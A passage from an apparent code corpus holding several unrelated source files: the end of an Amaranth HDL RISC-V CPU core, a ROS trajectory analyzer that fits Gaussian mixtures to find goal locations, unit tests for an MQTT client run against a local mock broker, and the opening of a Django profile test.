m.d.comb += load_rdata.eq(Cat(byte_rdata, Repl(byte_rdata[-1] & d_dph_signed, XLEN - 8)))
### Stage D/X ###
opc = cir[2 :7 ]
cir_rd = cir[7 :12]
funct3 = cir[12:15]
cir_rs1 = cir[15:20]
cir_rs2 = cir[20:25]
funct7 = cir[25:32]
rs1 = Signal(XLEN)
rs2 = Signal(XLEN)
pc = Signal(XLEN, reset=self.reset_vector - 4)
# ALU, and operand/operation selection
m.submodules.alu = alu = Hazard2ALU()
aluop_r_i = Signal(alu.op.shape())
with m.Switch(funct3):
with m.Case(0b000):
# Mask funct7 for I-format (!cir[5]), as it's part of the immediate
m.d.comb += aluop_r_i.eq(Mux(funct7[5] & cir[5], ALUOp.SUB, ALUOp.ADD))
with m.Case(0b001):
m.d.comb += aluop_r_i.eq(ALUOp.SLL)
with m.Case(0b010):
m.d.comb += aluop_r_i.eq(ALUOp.LT)
with m.Case(0b011):
m.d.comb += aluop_r_i.eq(ALUOp.LTU)
with m.Case(0b100):
m.d.comb += aluop_r_i.eq(ALUOp.XOR)
with m.Case(0b101):
m.d.comb += aluop_r_i.eq(Mux(funct7[5], ALUOp.SRA, ALUOp.SRL))
with m.Case(0b110):
m.d.comb += aluop_r_i.eq(ALUOp.OR)
with m.Case(0b111):
m.d.comb += aluop_r_i.eq(ALUOp.AND)
with m.Switch(opc):
with m.Case(RVOpc.OP):
m.d.comb += [
alu.i0.eq(rs1),
alu.i1.eq(rs2),
alu.op.eq(aluop_r_i),
]
with m.Case(RVOpc.OP_IMM):
m.d.comb += [
alu.i0.eq(rs1),
alu.i1.eq(imm_i(cir)),
alu.op.eq(aluop_r_i),
]
with m.Case(RVOpc.JAL):
m.d.comb += [
alu.i0.eq(pc),
alu.i1.eq(0),
alu.op.eq(ALUOp.ADD)
]
with m.Case(RVOpc.JALR):
m.d.comb += [
alu.i0.eq(pc),
alu.i1.eq(0),
alu.op.eq(ALUOp.ADD)
]
with m.Case(RVOpc.BRANCH):
m.d.comb += [
alu.i0.eq(rs1),
alu.i1.eq(rs2),
alu.op.eq(Mux(funct3 & 0x6 == 0x0, ALUOp.SUB,
Mux(funct3 & 0x6 == 0x4, ALUOp.LT, ALUOp.LTU)))
]
with m.Case(RVOpc.LUI):
m.d.comb += [
alu.i0.eq(0),
alu.i1.eq(imm_u(cir)),
alu.op.eq(ALUOp.ADD)
]
with m.Case(RVOpc.AUIPC):
m.d.comb += [
alu.i0.eq(pc),
alu.i1.eq(imm_u(cir)),
alu.op.eq(ALUOp.ADD),
alu.take4.eq(True)
]
# AGU
# Don't assert bus request during reset, it's a rude thing to do. Other than
# that we have the pedal to the metal all the time.
bus_available = Signal()
m.d.sync += bus_available.eq(1)
m.d.comb += self.htrans.eq(bus_available << 1)
agu_next_addr = Signal(XLEN)
access_is_load = cir_valid & ~d_dph_active & (opc == RVOpc.LOAD)
access_is_store = cir_valid & ~d_dph_active & (opc == RVOpc.STORE)
access_is_loadstore = access_is_load | access_is_store
take_branch = cir_valid & ~d_dph_active & (opc == RVOpc.BRANCH) & (alu.cmp != funct3[0])
take_jal = cir_valid & ~d_dph_active & (opc == RVOpc.JAL)
take_jalr = cir_valid & ~d_dph_active & (opc == RVOpc.JALR)
agu_op0 = Signal(XLEN)
agu_op1 = Signal(XLEN)
agu_offs = Signal(XLEN)
with m.If(access_is_load):
m.d.comb += [agu_op0.eq(rs1), agu_op1.eq(imm_i(cir))]
with m.Elif(access_is_store):
m.d.comb += [agu_op0.eq(rs1), agu_op1.eq(imm_s(cir))]
with m.Elif(take_branch):
m.d.comb += [agu_op0.eq(pc), agu_op1.eq(imm_b(cir))]
with m.Elif(take_jal):
m.d.comb += [agu_op0.eq(pc), agu_op1.eq(imm_j(cir))]
with m.Elif(take_jalr):
m.d.comb += [agu_op0.eq(rs1), agu_op1.eq(imm_i(cir))]
with m.Else():
m.d.comb += [agu_op0.eq(pc), agu_op1.eq(0)]
# Offset of +/-4 applied via third adder input (which tools will likely implement as carry-save)
m.d.comb += agu_offs.eq(Cat(
C(0, 2),
((take_branch | take_jal) & ~access_is_loadstore) | ~(access_is_loadstore | take_jalr),
Repl((take_branch | take_jal) & ~access_is_loadstore, 29)
))
m.d.comb += agu_next_addr.eq(agu_op0 + agu_op1 + agu_offs)
# Generate address-phase request
m.d.comb += self.haddr.eq(agu_next_addr)
with m.If(access_is_loadstore):
m.d.comb += [
self.hwrite.eq(access_is_store),
self.hsize.eq(funct3[:2])
]
with m.Else():
m.d.comb += [
self.hsize.eq(2)
]
# Update PC and track bus transfer status
with m.If(bus_available & self.hready):
with m.If(~access_is_loadstore):
# Force PC alignment, since we don't support traps
m.d.sync += pc.eq(agu_next_addr & -4)
m.d.sync += [
i_dph_active.eq(self.htrans[1] & ~access_is_loadstore),
# Note d_dph_active term stops the CIR from being marked as invalid on
# second cycle of a load/store dphase, since it's not consumed during this
# time (it is the CIR of the *next* instruction)
cir_valid.eq((i_dph_active | d_dph_active) & ~(take_branch | take_jal | take_jalr))
]
m.d.sync += [
d_dph_active.eq(self.htrans[1] & access_is_loadstore),
d_dph_addr.eq(self.haddr[:2]),
d_dph_size.eq(self.hsize[:2]),
d_dph_write.eq(self.hwrite),
d_dph_signed.eq(~funct3[2])
]
# Store data shifter
# Unaligned stores behave correctly as long as you don't do them
with m.Switch(d_dph_addr):
with m.Case(0):
m.d.comb += self.hwdata.eq(rs2)
with m.Case(1):
m.d.comb += self.hwdata.eq(Cat(rs2[:8], rs2[:8], rs2[16:]))
with m.Case(2):
m.d.comb += self.hwdata.eq(Cat(rs2[:16], rs2[:16]))
with m.Case(3):
m.d.comb += self.hwdata.eq(Cat(rs2[:24], rs2[:8]))
# Register file
m.submodules.regfile = regfile = Hazard2Regfile()
m.d.comb += [
# During load/store, the CIR is updated during cycle n, and the register
# file is read for next instruction on cycle n + 1, so delay addr using CIR.
regfile.raddr1.eq(Mux(d_dph_active, cir_rs1, self.hrdata[15:20])),
regfile.raddr2.eq(Mux(d_dph_active, cir_rs2, self.hrdata[20:25])),
regfile.ren.eq(~(access_is_loadstore | stall)),
rs1.eq(regfile.rdata1),
rs2.eq(regfile.rdata2)
]
reg_write_alu = cir_valid & ~d_dph_active & ~stall & (
(opc == RVOpc.OP) | (opc == RVOpc.OP_IMM) | (opc == RVOpc.JAL) |
(opc == RVOpc.JALR) | (opc == RVOpc.LUI) | (opc == RVOpc.AUIPC))
reg_write_load = d_dph_active & ~(stall | d_dph_write)
load_rd = Signal(cir_rd.shape())
with m.If(~stall):
m.d.sync += load_rd.eq(cir_rd)
m.d.comb += [
regfile.waddr.eq(Mux(reg_write_load, load_rd, cir_rd)),
regfile.wdata.eq(Mux(reg_write_load, load_rdata, alu.o)),
regfile.wen.eq(reg_write_load | reg_write_alu)
]
return m
|
22,032 | 9e32babb06239c99321508527ea8d7db926a027c | #!/usr/bin/env python3
import rospy
import rospkg
import math
import yaml
import os
import numpy as np
from sklearn.mixture import GaussianMixture
class TrajAnalyzer(object):
"""
does the analysis of traj data for the
all data is pulled as a list of individual trajectories
keyword_arguments
-----------------
folder: string
location of trajectory files (relative or absolute?)
num_goal_proposals: int
a proposed number of goal locations in a space
static_map: nav_msgs/OccupancyGrid
world map for use with graphing. if empty no map will be used
attributes
----------
list_traj_dirty: list
list of trajectories to be used unsorted
list_traj_filtered: list
list of trajectories after being cleaned
goal_proposals: list
array of guassian models where goals are likely to be
methods
-------
#TODO (60) traj_proposals()
return a array of gaussian models of size num_goal_proposals
using GMM
#TODO (120) traj_smoothing()
proposed method for removing walking data from traj_array
#TODO (45) proposal_graph(goals)
take proposed goals and show graph of locations. use seaborn it looks nice
#TODO (15) write_goals(name, to_file, to_param)
write goals to config folder or param server based on arguments
"""
def __init__(self, static_map, **config):
self.pkg = "sdpp_explore"
self.sub_folder = "/data/"
self.int_goal_proposals = 5
self.static_map = static_map
#update the config
self.__dict__.update(config)
if "traj_data_config" in config:
traj_data_config = config["traj_data_config"]
# i think this will work?
self.data_interface = TrajDataInterface(**traj_data_config)
else:
self.data_interface = TrajDataInterface()
goal_prop_config = {"pkg": "sdpp_explore"}
self.goal_interface = GoalProposalInterface(**goal_prop_config)
goal_loc = self.process_0()
self.goal_interface.save_goals(goal_loc)
def process_0(self):
"""
initial process for goal proposals
will return goal locs
"""
raw_data = self.pull_data(self.sub_folder)
prepped_data = self._prep_data(raw_data)
print(len(prepped_data))
gmm = GaussianMixture(5)
gmm.fit(prepped_data)
return gmm.means_
def traj_proposals(self, data, int_goal_proposals = 5):
gmm = GaussianMixture(int_goal_proposals)
gmm.fit(data)
return gmm.means_
def traj_smoothing(self):
pass
def proposal_graph(self):
pass
def pull_data(self, sub_folder):
"""
wrapping function for TrajDataInterface class to pull data
Parameters
----------
sub_folder : str
sub folder within package to pull data from
Returns
-------
list
list of raw trajectories
"""
data = self.data_interface.load_files_subdirect(sub_folder)
return data
def _prep_data(self, data):
list_trajectories_poses = []
for traj in data:
list_poses = []
for odom in traj["list_odom"]:
list_poses.append(self._pose_from_odom(odom))
list_trajectories_poses.append(list_poses)
prepped_data = self._XY_list(list_trajectories_poses)
return prepped_data
def _XY_list(self, data):
list_XY = []
for traj in data:
for time_step in traj:
list_XY.append([time_step[0], time_step[1]])
return list_XY
def _pose_from_odom(self, odom):
"""
takes nav_msg/odometry and extracts [x, y, z] pose
Parameters
----------
odom : nav_msgs/odometry
ROS odometry msg
Returns
-------
list
list of x, y, z pose
"""
pose = odom.pose.pose.position
return [pose.x, pose.y, pose.z]
def _twist_from_odom(self, odom):
"""
takes nav_msg/odometry and extracts [x, y, z] velocity
Parameters
----------
odom : nav_msgs/odometry
ROS odometry msg
Returns
-------
list
list of x, y, z velocity
"""
twist = odom.twist.twist.linear
return [twist.x, twist.y, twist.z]
class GoalProposalInterface(object):
def __init__(self, **configs):
self.pkg = "sdpp_explore"
self.__dict__.update(configs)
def save_goals(self, goals):
print(goals)
pkg_path = self._pkg_path(self.pkg)
pathname = pkg_path + "/config/"
pathname += "goals.yaml"
self._save_data_yaml(goals.tolist(), pathname)
def _save_data_yaml(self, data, pathname):
"""
saves data as a yaml file to the given pathname
Parameters
----------
data : list or dict
the data to be written
pathname : str
full filepath to save yaml too
"""
pathname = self._yaml_extension(pathname)
with open(pathname, "w") as outfile:
yaml.dump(data, outfile, default_flow_style=False)
def _pkg_path(self, pkg):
"""
returns the file path of a package.
Parameters
----------
pkg: string
name of package to get filepath for
Returns
------
pkg_path: string
the absolute path of desired package config folder
"""
r = rospkg.RosPack()
pkg_path = r.get_path(pkg)
return pkg_path
def _yaml_extension(self, string):
"""
add ".yaml" extension to string if needed
Parameters
----------
string: str
input filename for checking
Returns
------
string: str
filename with .yaml extension
"""
if string.endswith(".yaml"):
pass
else:
string += ".yaml"
return string
class TrajDataInterface(object):
"""
Interface class designed to unify loading and saving of traj data objects
keyword arguments
-----------------
pkg: string
ROS package from where to load and save data from
"""
def __init__(self, **configs):
"""
initialize the object. currently only keeps track of pkg location
"""
self.pkg = "sdpp_explore"
self.__dict__.update(configs)
def set_package(self, pkg):
"""
set the package attribute. used for finding relative pathing
Parameters
----------
pkg : str
name of ROS package
"""
self.pkg = pkg
def load_files_subdirect(self, subdirect):
list_data = []
full_path = self._pkg_path(self.pkg) + subdirect
all_files = self.list_of_files(full_path)
yaml_files = self._purge_except_yaml(all_files)
for item in yaml_files:
list_data.append(self._load_data_yaml(item))
return list_data
def list_files_yaml_of_subdirect(self, subdirect):
"""
lists all the yaml files within a subdirectory of the pkg attribute
Parameters
----------
subdirect : str
the name of the subdirectory
"""
pkg_path = self._pkg_path(self.pkg)
all_files = self.list_of_files(pkg_path + subdirect)
yaml_files = self._purge_except_yaml(all_files)
return yaml_files
def list_of_files(self, dirname):
"""
returns array of all file locations within the dirname
Parameters
----------
dirname : str
directory to search for files in
Returns
-------
list of str
list of strings with paths
"""
list_of_files = os.listdir(dirname)
all_files = []
for entry in list_of_files:
full_path = os.path.join(dirname, entry)
if os.path.isdir(full_path):
all_files = all_files + self.list_of_files(full_path)
else:
all_files.append(full_path)
return all_files
def load_file(self, filepath):
"""
loads and returns the data from a filepath
currently only suports yaml
Parameters
----------
filepath : str
the location of a file
Returns
-------
list or dict
dictionary or list of data from within file
"""
filepath = self._yaml_extension(filepath)
data = self._load_data_yaml(filepath)
return data
def _purge_except_yaml(self, list_files):
"""
removes all files that do not have yaml extension
Parameters
----------
list_files : list of str
flist filepaths to purge
Returns
-------
list of str
list of filepaths with yaml extension
"""
yaml_files = []
for filepath in list_files:
if filepath.endswith(".yaml"):
yaml_files.append(filepath)
return yaml_files
def _load_data_yaml(self, pathname):
"""
open and load yaml file
Returns
-------
list or dict
contents of yaml file
"""
pathname = self._yaml_extension(pathname)
with open(pathname) as file:
traj_data = yaml.load(file, Loader=yaml.FullLoader)
return traj_data
def _save_data_yaml(self, data, pathname):
"""
saves data as a yaml file to the given pathname
Parameters
----------
data : list or dict
the data to be written
pathname : str
full filepath to save yaml too
"""
pathname = self._yaml_extension(pathname)
with open(pathname, "w") as outfile:
yaml.dump(data, outfile, default_flow_style=False)
def _yaml_extension(self, string):
"""
add ".yaml" extension to string if needed
Parameters
----------
string: str
input filename for checking
Returns
------
string: str
filename with .yaml extension
"""
if string.endswith(".yaml"):
pass
else:
string += ".yaml"
return string
def _pkg_path(self, pkg):
"""
returns the file path of a package.
Parameters
----------
pkg: string
name of package to get filepath for
Returns
------
pkg_path: string
the absolute path of desired package config folder
"""
r = rospkg.RosPack()
pkg_path = r.get_path(pkg)
return pkg_path
|
22,033 | 06a64f8fa0bfcd60b7b77ae03379440b99069bf2 | import asyncio
import binascii
import logging
import queue
import socket
import sys
import threading
import unittest
from io import StringIO
from unittest.mock import patch
import mqttools
HOST = 'localhost'
PORT = 0
class Broker(threading.Thread):
EXPECTED_DATA_INDEX = 0
EXPECTED_DATA_STREAM = []
ACTUAL_DATA_STREAM = []
def __init__(self):
super().__init__()
self._listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._listener.bind((HOST, PORT))
self._listener.listen()
self._client_closed = queue.Queue()
@property
def address(self):
return self._listener.getsockname()[:2]
def wait_for_client_closed(self):
self._client_closed.get(timeout=1)
def run(self):
while True:
print('Broker: Listening for client...')
self.serve_client(self._listener.accept()[0])
self._client_closed.put(True)
def serve_client(self, client):
print('Broker: Serving client...')
while self.EXPECTED_DATA_INDEX < len(self.EXPECTED_DATA_STREAM):
_, data = self.EXPECTED_DATA_STREAM[self.EXPECTED_DATA_INDEX]
size = len(data)
data = client.recv(size)
if not data:
break
self.EXPECTED_DATA_INDEX += 1
# print(f'Broker: Received: {data}')
self.ACTUAL_DATA_STREAM.append(('c2s', data))
while self.EXPECTED_DATA_INDEX < len(self.EXPECTED_DATA_STREAM):
direction, data = self.EXPECTED_DATA_STREAM[self.EXPECTED_DATA_INDEX]
if direction != 's2c':
break
self.EXPECTED_DATA_INDEX += 1
# print(f'Broker: Sending: {data}')
client.send(data)
self.ACTUAL_DATA_STREAM.append(('s2c', data))
client.close()
class MQTToolsTest(unittest.TestCase):
def setUp(self):
Broker.EXPECTED_DATA_INDEX = 0
Broker.EXPECTED_DATA_STREAM = []
Broker.ACTUAL_DATA_STREAM = []
Broker.CLOSE_AFTER_INDEX = -1
self.broker = Broker()
self.broker.daemon = True
self.broker.start()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.broker.wait_for_client_closed()
self.loop.close()
self.assertEqual(Broker.ACTUAL_DATA_STREAM, Broker.EXPECTED_DATA_STREAM)
def run_until_complete(self, coro):
return self.loop.run_until_complete(coro)
def test_start_stop(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.stop())
def test_empty_context_manager(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
async def manager():
async with mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0):
pass
self.run_until_complete(manager())
def test_subscribe(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# SUBSCRIBE
('c2s', b'\x82\n\x00\x01\x00\x00\x04/a/b\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x01\x00\x00'),
# SUBSCRIBE
('c2s', b'\x82\n\x00\x02\x00\x00\x04/a/c\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x02\x00\x00'),
# SUBSCRIBE with invalid topic
('c2s', b'\x82\x09\x00\x03\x00\x00\x03/a#\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x03\x00\xa2'),
# PUBLISH QoS 0
('s2c', b'\x30\x0a\x00\x04/a/b\x00apa'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.subscribe('/a/b'))
self.run_until_complete(client.subscribe('/a/c'))
with self.assertRaises(mqttools.SubscribeError) as cm:
self.run_until_complete(client.subscribe('/a#'))
self.assertEqual(cm.exception.reason,
mqttools.SubackReasonCode.WILDCARD_SUBSCRIPTIONS_NOT_SUPPORTED)
message = self.run_until_complete(client.messages.get())
self.assertEqual(message.topic, '/a/b')
self.assertEqual(message.message, b'apa')
self.run_until_complete(client.stop())
def test_subscribe_retain_handling_values(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# SUBSCRIBE retain handling 0
('c2s', b'\x82\n\x00\x01\x00\x00\x04/a/b\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x01\x00\x00'),
# SUBSCRIBE retain handling 1
('c2s', b'\x82\n\x00\x02\x00\x00\x04/a/c\x10'),
# SUBACK
('s2c', b'\x90\x04\x00\x02\x00\x00'),
# SUBSCRIBE retain handling 2
('c2s', b'\x82\n\x00\x03\x00\x00\x04/a/d\x20'),
# SUBACK
('s2c', b'\x90\x04\x00\x03\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.subscribe('/a/b', 0))
self.run_until_complete(client.subscribe('/a/c', 1))
self.run_until_complete(client.subscribe('/a/d', 2))
self.run_until_complete(client.stop())
def test_unsubscribe(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# SUBSCRIBE
('c2s', b'\x82\n\x00\x01\x00\x00\x04/a/b\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x01\x00\x00'),
# UNSUBSCRIBE
('c2s', b'\xa2\x09\x00\x02\x00\x00\x04/a/b'),
# UNSUBACK
('s2c', b'\xb0\x04\x00\x02\x00\x00'),
# UNSUBSCRIBE from non-subscribed topic
('c2s', b'\xa2\x09\x00\x03\x00\x00\x04/a/d'),
# UNSUBACK
('s2c', b'\xb0\x04\x00\x03\x00\x11'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
self.run_until_complete(client.subscribe('/a/b'))
self.run_until_complete(client.unsubscribe('/a/b'))
with self.assertRaises(mqttools.UnsubscribeError) as cm:
self.run_until_complete(client.unsubscribe('/a/d'))
self.assertEqual(cm.exception.reason,
mqttools.UnsubackReasonCode.NO_SUBSCRIPTION_EXISTED)
self.run_until_complete(client.stop())
def test_publish_qos_0(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x0a\x00\x04/a/b\x00apa'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
keep_alive_s=0,
topic_alias_maximum=0)
self.run_until_complete(client.start())
client.publish(mqttools.Message('/a/b', b'apa'))
self.run_until_complete(client.stop())
def test_command_line_publish_qos_0(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
(
'c2s',
b'\x10\x20\x00\x04MQTT\x05\x02\x00<\x03"\x00\n\x00\x10'
b'mqttools_publish'
),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x0a\x00\x04/a/b\x00apa'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
argv = [
'mqttools',
'publish',
'--host', self.broker.address[0],
'--port', str(self.broker.address[1]),
'--client-id', 'mqttools_publish',
'/a/b',
'617061'
]
stdout = StringIO()
with patch('sys.stdout', stdout):
with patch('sys.argv', argv):
mqttools.main()
self.assertIn('Published 1 message(s) in', stdout.getvalue())
def test_command_line_publish_qos_0_generate_message(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
(
'c2s',
b'\x10\x20\x00\x04MQTT\x05\x02\x00<\x03"\x00\n\x00\x10'
b'mqttools_publish'
),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x11\x00\x04/a/b\x000\xa5\xa5\xa5\xa5\xa5\xa5\xa5\xa5\xa5'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
argv = [
'mqttools',
'publish',
'--host', self.broker.address[0],
'--port', str(self.broker.address[1]),
'--client-id', 'mqttools_publish',
'--size', '10',
'/a/b'
]
stdout = StringIO()
with patch('sys.stdout', stdout):
with patch('sys.argv', argv):
mqttools.main()
self.assertIn('Published 1 message(s) in', stdout.getvalue())
def test_command_line_publish_qos_0_generate_short_message(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
(
'c2s',
b'\x10\x20\x00\x04MQTT\x05\x02\x00<\x03"\x00\n\x00\x10'
b'mqttools_publish'
),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x000'),
# PUBLISH
('c2s', b'\x30\x08\x00\x04/a/b\x001'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
argv = [
'mqttools',
'publish',
'--host', self.broker.address[0],
'--port', str(self.broker.address[1]),
'--client-id', 'mqttools_publish',
'--count', '11',
'--size', '1',
'/a/b'
]
stdout = StringIO()
with patch('sys.stdout', stdout):
with patch('sys.argv', argv):
mqttools.main()
self.assertIn('Published 11 message(s) in', stdout.getvalue())
def test_publish_topic_alias(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK with topic alias 5
('s2c', b'\x20\x06\x00\x00\x03\x22\x00\x05'),
# PUBLISH to set alias
(
'c2s',
b'\x30\x2c\x00\x12/test/mqttools/foo\x03\x23\x00\x01'
b'sets-alias-in-broker'
),
# PUBLISH using alias
('c2s', b'\x30\x1a\x00\x00\x03\x23\x00\x01published-with-alias'),
# PUBLISH without alias
('c2s', b'\x30\x24\x00\x12/test/mqttools/fie\x00not-using-alias'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
topic_aliases=[
'/test/mqttools/foo'
],
topic_alias_maximum=0,
keep_alive_s=0)
self.run_until_complete(client.start())
client.publish(mqttools.Message('/test/mqttools/foo', b'sets-alias-in-broker'))
client.publish(mqttools.Message('/test/mqttools/foo', b'published-with-alias'))
client.publish(mqttools.Message('/test/mqttools/fie', b'not-using-alias'))
self.run_until_complete(client.stop())
def test_use_all_topic_aliases(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK with topic alias 1
('s2c', b'\x20\x06\x00\x00\x03\x22\x00\x01'),
# PUBLISH to set alias
('c2s', b'\x30\x0d\x00\x04/foo\x03\x23\x00\x01apa'),
# PUBLISH, no alias available
('c2s', b'\x30\x0a\x00\x04/bar\x00cat'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
topic_aliases=[
'/foo'
],
topic_alias_maximum=0,
keep_alive_s=0)
self.run_until_complete(client.start())
client.publish(mqttools.Message('/foo', b'apa'))
client.publish(mqttools.Message('/bar', b'cat'))
self.run_until_complete(client.stop())
def test_connack_unspecified_error(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT
('c2s', b'\x10\x10\x00\x04MQTT\x05\x02\x00\x00\x00\x00\x03bar'),
# CONNACK with unspecified error
('s2c', b'\x20\x03\x00\x80\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
topic_alias_maximum=0,
connect_delays=[],
keep_alive_s=0)
with self.assertRaises(mqttools.ConnectError) as cm:
self.run_until_complete(client.start())
self.assertEqual(str(cm.exception), 'UNSPECIFIED_ERROR(128)')
def test_receive_topic_alias(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT with topic alias 5
(
'c2s',
b'\x10\x13\x00\x04MQTT\x05\x02\x00\x00\x03\x22\x00\x05\x00\x03bar'
),
# CONNACK
('s2c', b'\x20\x03\x00\x00\x00'),
# SUBSCRIBE
('c2s', b'\x82\x18\x00\x01\x00\x00\x12/test/mqttools/foo\x00'),
# SUBACK
('s2c', b'\x90\x04\x00\x01\x00\x00'),
# PUBLISH using an unknown alias 1
(
's2c',
b'\x30\x22\x00\x00\x03\x23\x00\x01published-with-unknown-alias'
),
# PUBLISH using alias an invalid alias 6
(
's2c',
b'\x30\x34\x00\x12/test/mqttools/foo\x03\x23\x00\x06'
b'sets-invalid-alias-in-client'
),
# PUBLISH to set alias
(
's2c',
b'\x30\x2c\x00\x12/test/mqttools/foo\x03\x23\x00\x01'
b'sets-alias-in-client'
),
# PUBLISH using alias
('s2c', b'\x30\x1a\x00\x00\x03\x23\x00\x01published-with-alias'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
topic_alias_maximum=5,
keep_alive_s=0)
self.run_until_complete(client.start())
self.run_until_complete(client.subscribe('/test/mqttools/foo'))
message = self.run_until_complete(client.messages.get())
self.assertEqual(message.topic, '/test/mqttools/foo')
self.assertEqual(message.message, b'sets-alias-in-client')
message = self.run_until_complete(client.messages.get())
self.assertEqual(message.topic, '/test/mqttools/foo')
self.assertEqual(message.message, b'published-with-alias')
self.run_until_complete(client.stop())
def test_resume_session(self):
Broker.EXPECTED_DATA_STREAM = [
# CONNECT with clean session 0 (to resume) and session
# expiry interval 120.
(
'c2s',
b'\x10\x15\x00\x04MQTT\x05\x00\x00\x00\x05\x11\x00\x00\x00\x78'
b'\x00\x03bar'
),
# CONNACK with no session present
('s2c', b'\x20\x03\x00\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00'),
# CONNECT with clean session 0 (to resume) and session
# expiry interval 120.
(
'c2s',
b'\x10\x15\x00\x04MQTT\x05\x00\x00\x00\x05\x11\x00\x00\x00\x78'
b'\x00\x03bar'
),
# CONNACK with session present
('s2c', b'\x20\x03\x01\x00\x00'),
# DISCONNECT
('c2s', b'\xe0\x02\x00\x00')
]
client = mqttools.Client(*self.broker.address,
'bar',
session_expiry_interval=120,
topic_alias_maximum=0,
connect_delays=[],
keep_alive_s=0)
with self.assertRaises(mqttools.SessionResumeError):
self.run_until_complete(client.start(resume_session=True))
self.run_until_complete(client.stop())
self.broker.wait_for_client_closed()
self.run_until_complete(client.start(resume_session=True))
self.run_until_complete(client.stop())
logging.basicConfig(level=logging.DEBUG)
if __name__ == '__main__':
unittest.main()
|
22,034 | 1c5270ad50acc3e6fa0af2a384bae3ddfed017d5 | from django.test import TestCase
from django.core.urlresolvers import reverse
from django.urls import resolve
from django.contrib.auth.models import User
from datetime import datetime
from account.models import Profile
from account.forms import SignUpForm
from account.views import signup
class ProfileTests(TestCase):
def setUp(self):
"""Setup a user with inserted profile components"""
self.u1 = User.objects.create(username='Gabby')
